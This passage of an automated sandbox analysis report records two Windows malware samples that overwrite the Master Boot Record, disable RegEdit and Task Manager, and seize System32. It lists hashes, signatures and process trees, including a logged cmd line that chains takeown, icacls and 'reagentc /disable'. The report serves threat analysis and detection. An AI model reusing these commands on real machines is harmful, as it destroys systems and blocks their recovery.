| SHA256 | 4df24a47fc341108a2ebe26b8f07cc95c747bb0eef303e51b67d34ccd76165a1 |
| SHA512 | b85b1e4488df589a9003ede76c1efc71f97900701caf4c9740cee88aa1e3a19e5080d986c82d82e7b73a8026af801691523d238f26a3f6afd8bf7c95d4f15a1a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe59f1f7.TMP
| MD5 | e45b6ce8db578ed000e07f804140e2c9 |
| SHA1 | 3cc3992f773c9b2923c0f7d1e6769826a1651c1b |
| SHA256 | 70a3d26a640ba944be6f01f2cb22bd5d8df6956aff50168ee1c2eae5fb831224 |
| SHA512 | 1f23f7831bdd526665943e894d82369c32035a3fa67160c5b05380657b7d63502696f77a4dfbe8a9e300059c52b56f070e90fbf74bf890ff40576ed14fb87fae |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005
| MD5 | 20c445cbe3e4ce22a27adb4c9e6abc31 |
| SHA1 | 20720f5abfd8fc516ba11d5431d7878a99ab0209 |
| SHA256 | a64877eb7b067cf0a182dd5e7422f44248178a8dc9269334df4284338d08fe10 |
| SHA512 | 2b9270ac5117361553a356e6b2ae133f01d56bce53bb673f81d177eb91e9bed65ce5fd49dea20f6fb6cfee0904a8af18b885a31b7b92af143dec0d9db254ec1e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\06970815-d0fd-4f9a-b1b1-d33b27eabdd7\index
| MD5 | 54cb446f628b2ea4a5bce5769910512e |
| SHA1 | c27ca848427fe87f5cf4d0e0e3cd57151b0d820d |
| SHA256 | fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d |
| SHA512 | 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 6bd349906eb33fb2634187f3fdab856f |
| SHA1 | 8e59b494932ef51a3c871492b298d820e7e74e12 |
| SHA256 | eafbc00fb7251d5bed88dd2dae2b5ee6d6b71045b63d1fbf924a017637dac253 |
| SHA512 | ab7c9ccb57458c644cc63bff792b662d1c65db5ab03cf9bda928cfdfae24abe9a6c352c7593db5d068867e9c2baa66a0d173b00e0b532f0ce458a8dcd75843fb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012
| MD5 | 56cf88a250e483d0b17bd6b3a5cf245d |
| SHA1 | 7ee18462db98275a742167c02a7bcb9b9cd9ed56 |
| SHA256 | 287c5696a5e55b44b025c7356abaeaae0859487c581a26ccb5ca02fd6b7fea9a |
| SHA512 | 23ff85c0e6e4c073fbacea6325663ab4a60f6d5226cfb57bdf8ac05117d01ba4a324650be599d4cb3b3081b31cbcb4ce9555fec6ffacf8376a7269f406b09e00 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 1977775f015b0adcf4d4e7aaadd5466d |
| SHA1 | e2ceaa2724fc7681e43ede7dd30406ac228f6359 |
| SHA256 | 378f65db2169da56cba03d5ccf836a9ccc5121cb43d908230dd1040e90c3a4ba |
| SHA512 | f9b63fb8a7dcbebd672326c7da50539fa129ea85d5e1a53e5b37e2cb41d71867702c6f7460f9b4bd308561ecea4e3c4fc530b46e7a24ea3c53cb75121903b91a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d647b9c29dd523d544c881fc1c716794 |
| SHA1 | 160ce2ccc86bf07797eae9539a7a7891ff453f68 |
| SHA256 | a6fcc34b62b1c8a6b8bf12e8b1c7473806c4e198c5ffa7aa63f996037afb80ce |
| SHA512 | 884ad7f53599c97cf6ada99d21f5e64735c68d39c567541f4a909db6ab6fd65acbc19b95c6d6bd6ba165711d8cecf5430a6b52ccb14309c89c4fc2101750743c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 92959fa9757bf93c4b4b99a3a807a123 |
| SHA1 | c22cd28c96219036beeeabe09e9f910e50dd812d |
| SHA256 | 7a3500ad86f6ece190ed078a8687f24e00af4a8160bc3429bc17d75a07411dfa |
| SHA512 | 57a206f5f7d0288f2b0470031448d3b5feecd7358c2f251394bcf95608bc86ec20aaa0497bbbe1abef9c4d9c50ca5dcb2c4aa25dcd771b2d3006bf3a290d8c50 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | de2495686c6ca82f4a25505c1e652861 |
| SHA1 | fc2771120c984a790778a7f9ccbf2ed129273afe |
| SHA256 | 8e99515d955278ffa8fb6646980e2a18b884447f085265f72270c17513a02fae |
| SHA512 | 493bf434aad941ec0f086a09c6b7c1ecb4aec602f2bacae488e50387e9146f8c507d700148fa7c48fba3a5e6bfc2d98fadeb543887e166aa1d630b6aa8e28ec8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 5033cdbd0ed9622d2570d883b04b4724 |
| SHA1 | 74d961b02af77e67d855f8a2deea0bbb6ac16bba |
| SHA256 | d9da5fb3912e8bbbc006a2c716b6d51f672374584cba5edb106bd3cc9679518b |
| SHA512 | 49ad2f61cc6b1d7531050c2234237b6f9b1d2822baf3519977963377447d9f3898f3701f18c11f68ebff836330ee415a5c076eb47c97c3384d881b5a50f9d744 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | a5d6c1761f943c0545461dc0039380e6 |
| SHA1 | 64033d53d8aabed06559ebbebf92299ac6f44d01 |
| SHA256 | 1e8e8444728d86de5966a57ef4742b3497537fde68cc9b2ae3727e6bd26494ce |
| SHA512 | 09e2c099e4809258b3045064a1cc7c5ae7ff606ed4d39752b12c3e8adb8945ef7786705be52b914a38dc4d577962896ec70a5e177b5cbd62405a625dc5b12ac9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\e20b7581-2e51-4d25-9e5b-0b6449ed3a8b\index-dir\the-real-index~RFe5a9ba5.TMP
| MD5 | 7f69422f82441a5e2899be4b0665211b |
| SHA1 | e7840a3be7eb48aeacf7ead1ddc92639d7a50e90 |
| SHA256 | 83442da987bfb0c761866a4a773d9dddd7b6fb9a0b56179e202c209be8b366df |
| SHA512 | 72b3b4d4ebcfc03886a18c28c6bbdd6b0b8ce75603ec8e941c10b812f6e879d9a7d51e10e7af8f9e3a019ef4f90595b46396872c8bfa7a339448f9d3c0528c08 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\e20b7581-2e51-4d25-9e5b-0b6449ed3a8b\index-dir\the-real-index
| MD5 | 88302b60088b2a8929346f3a955117bb |
| SHA1 | f361e3c213c3049fdfa2081e7fe8a49b1148169c |
| SHA256 | 2067635aeadb95277d65c10a5a0f9853d968fb8d52bbc9f1062e2f6c972100b2 |
| SHA512 | ea5ec595d14c0cad075551237bbed5150a6b64df40e6ac62df656059b25a112f5f7df86d661541dc4964644f250483c0903ce589bf2e86a9ba1b835b531df268 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 8021cb0fe3e7f40e59c39554e864a9ae |
| SHA1 | b6c44e8bfb3950fa9fe735e311dec1a4b7cbe887 |
| SHA256 | 42e951da1e02f12379d747a01e2c103188e2b1ce199cca549487f5ffc64fbb51 |
| SHA512 | 1dc41c9901f271db1083c00bfef9bc09388dd6d21cd6063bac4319c6ec01cecebe86cb419292d6b55c5ff55b6ef7815585baa6c3c5de7fe864fff70d09290b71 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:32
Platform
win7-20240221-en
Max time kernel
132s
Max time network
125s
Command Line
Signatures
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows NT 32\MBR.exe | N/A |
| N/A | N/A | C:\Program Files\Windows NT 32\AdStRkJ_sound.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files\Windows NT 32\MBR.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\sfc.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File created | C:\Windows\System32\taskkill.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery\ReAgent.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File created | C:\Windows\System32\notepad.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Windows\System32\notepad.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows NT 32\sound.wav | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT 32\AdStRkJ_sound.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT 32\MBR.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT 32\lock_files.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Windows NT 32\AdStRkJ_sound.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Windows NT 32\AdStRkJ_sound.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe
"C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k color 47 && title Critical process && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && reagentc.exe /disable && Exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32 /grant Admin:F
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers /grant Admin:F
C:\Windows\system32\ReAgentc.exe
reagentc.exe /disable
C:\Program Files\Windows NT 32\MBR.exe
"C:\Program Files\Windows NT 32\MBR.exe"
C:\Program Files\Windows NT 32\AdStRkJ_sound.exe
"C:\Program Files\Windows NT 32\AdStRkJ_sound.exe"
Network
Files
memory/1048-0-0x000007FEF5AD0000-0x000007FEF64BC000-memory.dmp
memory/1048-1-0x0000000000030000-0x0000000002190000-memory.dmp
memory/1048-2-0x000000001D470000-0x000000001D4F0000-memory.dmp
C:\Program Files\Windows NT 32\lock_files.exe
| MD5 | 1a287576d58f0c02fc4b772c594148eb |
| SHA1 | 6a7caea118b97dc253a7f67ce0b7118b7fd78136 |
| SHA256 | ebd87671cbcf7c6409571c18e2d8350662851df64e6644c76b12a1b40a8c1dc6 |
| SHA512 | ca6ef3c8433b0f1d68458665ee9bbb7b323c2404100d5c86d6a6b327bdcdba8dec0aea3412772cd6e646b16aae36afd3d2a73be70f9b6500ab5f0d065a7e3eb6 |
C:\Program Files\Windows NT 32\MBR.exe
| MD5 | a0195c08fbfe459520423bf0a7c20504 |
| SHA1 | 9d62a03597d8c056951e8d377b4db62b51fbbfa3 |
| SHA256 | 95a2cfb0da507b544ae915d6fd2a8d4fd8acb2456310e11d1bc066b531449ea9 |
| SHA512 | 51c9cc7ade18fe5ffd8c58df5f573f625ee6831a8e3d87b8d529ad67a4334a7ca69e311e3a2b93e33b57879c93e20e8d7eef9f3ebc22b55c63f6a7a759bbadc5 |
memory/2620-21-0x0000000000400000-0x0000000000433000-memory.dmp
memory/1048-22-0x000007FEF5AD0000-0x000007FEF64BC000-memory.dmp
memory/1048-23-0x000000001D470000-0x000000001D4F0000-memory.dmp
C:\Program Files\Windows NT 32\AdStRkJ_sound.exe
| MD5 | 330d74c84f4597a0c7f45b232c7b0ae2 |
| SHA1 | 46d93d7d2907e60c0b5fb3fd7246410c33a591e9 |
| SHA256 | 6b685298579ec278cf041c12ef0ddbc102567ef274bdd43711643da89ba799e1 |
| SHA512 | c88cd6a3e511a76e6baccf9b30ace996689432e335b264996cf6ce3b2f0947515e34151bc620dae1a05d96342be0f856832814a3b7cd5b898b0f8b08ca371814 |
memory/324-28-0x0000000000D90000-0x0000000000DB8000-memory.dmp
memory/324-29-0x000007FEF5AD0000-0x000007FEF64BC000-memory.dmp
memory/1048-30-0x000000001D470000-0x000000001D4F0000-memory.dmp
C:\Program Files\Windows NT 32\sound.wav
| MD5 | c22ec43f4e6c8b4189860c054a4064e5 |
| SHA1 | 3b1885ca71df82a3906c71b51c0a373e8dc4d474 |
| SHA256 | 35481f89e8b2eee81ceb5b514b44cb13dca103603a2501fbac6826fbca490c0f |
| SHA512 | 51a88f9e4ccee4528c47c909eb6141338f6371591276bcb2eb1dcda92ace4af621e2c8a9d36def7403a9ed8a591ef0e544108d4f539737b9054ddebef068d432 |
memory/1048-32-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-33-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-34-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-35-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-36-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-37-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-38-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/324-39-0x000007FEF5AD0000-0x000007FEF64BC000-memory.dmp
memory/1048-40-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-41-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-42-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-43-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-44-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-45-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-46-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-47-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-48-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-49-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-50-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-51-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-52-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-53-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-54-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-55-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-56-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-57-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-58-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-59-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-60-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-61-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-62-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-63-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-64-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-65-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-67-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-66-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-68-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-69-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-70-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-71-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-72-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-73-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-74-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-75-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-76-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-77-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-78-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-79-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-80-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-81-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-82-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-83-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-84-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-85-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-86-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-87-0x0000000020870000-0x0000000020970000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:32
Platform
win7-20240215-en
Max time kernel
137s
Max time network
121s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\mbrwriter.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\mlt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\mousedraw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\ATohou.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\circle.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\AWave.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\reds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\cubes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\bytebeat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\scl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\txtout2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\PatBlt3.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\1268.tmp\mbrwriter.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\mbrwriter.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\mlt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\mousedraw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\ATohou.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\circle.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\AWave.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\reds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\bytebeat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\cubes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\scl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\PatBlt3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\txtout2.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\scl.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Anatralier.exe
"C:\Users\Admin\AppData\Local\Temp\Anatralier.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1268.tmp\1269.bat C:\Users\Admin\AppData\Local\Temp\Anatralier.exe"
C:\Windows\system32\cscript.exe
cscript prompt.vbs
C:\Users\Admin\AppData\Local\Temp\1268.tmp\mbrwriter.exe
mbrwriter.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\1.exe
1.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\mlt.exe
mlt.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\mousedraw.exe
mousedraw.exe
C:\Windows\system32\timeout.exe
timeout 60
C:\Windows\system32\taskkill.exe
taskkill /f /im 1.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im mlt.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\ATohou.exe
ATohou.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\circle.exe
circle.exe
C:\Windows\system32\timeout.exe
timeout 30
C:\Windows\system32\taskkill.exe
taskkill /f /im circle.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im ATohou.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\AWave.exe
AWave.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\reds.exe
reds.exe
C:\Windows\system32\timeout.exe
timeout 40
C:\Windows\system32\taskkill.exe
taskkill /f /im AWave.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im reds.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\bytebeat.exe
bytebeat.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\cubes.exe
cubes.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\scl.exe
scl.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\PatBlt3.exe
PatBlt3.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\txtout2.exe
txtout2.exe
C:\Windows\system32\timeout.exe
timeout 60
Network
Files
C:\Users\Admin\AppData\Local\Temp\1268.tmp\1269.bat
| MD5 | 9bbf761a8af3bc468e81625de8a66776 |
| SHA1 | af48afce2581501b5f8a1b949fe6f12145256653 |
| SHA256 | e0392f29af97bada38428aff5574776a44cb757c6ef8a7cfe9c93b86e8d61d5c |
| SHA512 | cce724b5ede94b729767b449b29082399b8d041e5fb51b75164807ae0d249eac0fb17aaec43e0077493ee8b5c03b6d9f89f050e063c8b0009fa7beefdb329e66 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\prompt.vbs
| MD5 | 7d598596e9af07501ca9f98f5d32166e |
| SHA1 | 21c748745a9c2f98ee88cfeb9d3d0d77523a0aa0 |
| SHA256 | 4f641829a7a076a5c5d77e4561779d62a3dded791fbf52e10bcbd0c3045ad402 |
| SHA512 | a63cceb82d70810feaf94c85123f8f861f59b918b9168d43efb6ef2ba8e82ed410718d540a2fa0d74aecfd40dda1c23e25563c52fe69b80407c31a661b81a561 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\mousedraw.exe
| MD5 | f7db0edd465e545dcd947f4beef32779 |
| SHA1 | a02d2dcbe4ea1146b726a6191354340f8dd41f6a |
| SHA256 | 9bbce9c9e1b513084b8a206e935b2512a341fd81688e71735ef27511d0378d47 |
| SHA512 | 6d40cf365a30277328f9103083e939ac8fedf860ffef6d0c5bd80d708e0f73d606f456d37aa1fa5e69964ac2e20c263fbaa755a9c28eff962395e3509a7a4e25 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\1.wav
| MD5 | 8c5007acc14fc8fd7aa7dc659e30ebb5 |
| SHA1 | 91025f286d71dd7821989c24f752369c360386ba |
| SHA256 | bcfd13d3f19003f29e2ebf48a696972a427ba53c7d93f59340431d00e550c30e |
| SHA512 | 0cb8a6e4760410a4f739f32339a8ee85fc7e41099eba204d255bda5e9497ab584b1483115617c946dcbe7c8ba8c3d0763d81d29cbaf70812213f9ad17d974188 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\mlt.exe
| MD5 | bc183f5854488a0774969ec19b492153 |
| SHA1 | 2e08a1bbf1b09d989f86b80ce5cdc4f22dc65ad5 |
| SHA256 | 4b97506ae7118dea78e251492166888732815f5cdc90b9c56de2f9ee3862b20f |
| SHA512 | 25a0d999d5d620f48e8d4bc1cb59013ecb5d33250d72e23211e5348fb38573cb3ec82a8370547b59bde9c4d7e555ec7f1dd48c284eabf0f33b595e562f4d3780 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\1.exe
| MD5 | a14ba46ecdc37d9e73efd734b0ab4db9 |
| SHA1 | 9e72f4b89d2643110b2e3efc80c14222a5e00014 |
| SHA256 | 94aa578b5c5fe98f2f8e81705fff8addab6f2f4c2749778ef942b1cfab5b6aa8 |
| SHA512 | 432bbda373fb97bef1a1a8a7292eb85f70cb7866741bf000d5775a6a9a261124ab24b3e053a6f4726a5b3e48d5c5de4f86deb24ea25265dd0945b9740156268b |
memory/2760-49-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1268.tmp\mbrwriter.exe
| MD5 | e2b95fc712d453a57101f9867d384d2c |
| SHA1 | 993eb1acb51ad2ab2e280d3729a56817a3097085 |
| SHA256 | e505465cef9e734ef29dd9803c848960a55dc6c35fa4bf8c275336d2119ddc62 |
| SHA512 | 25a4b6cc6d8908933ef13737aabe0bd56c1356b5f98bfe3e09c6b92fb358a1a65e35549e2d624574fda23fc91731091f0a80eeb9dc5ca2c1d96ba9a88fd5f109 |
memory/2488-57-0x0000000000400000-0x0000000000409000-memory.dmp
memory/2704-58-0x0000000000400000-0x000000000041D000-memory.dmp
memory/2256-59-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1268.tmp\ATohou.exe
| MD5 | d7064aa7ee28f685757e7455d4e49c6a |
| SHA1 | 535d326ab1453bed0c050c8822aee9ef54c8b26e |
| SHA256 | 5028f3b3e63609038404bf6e3c2dbc360892312d85aa11e83489f381f09fb99b |
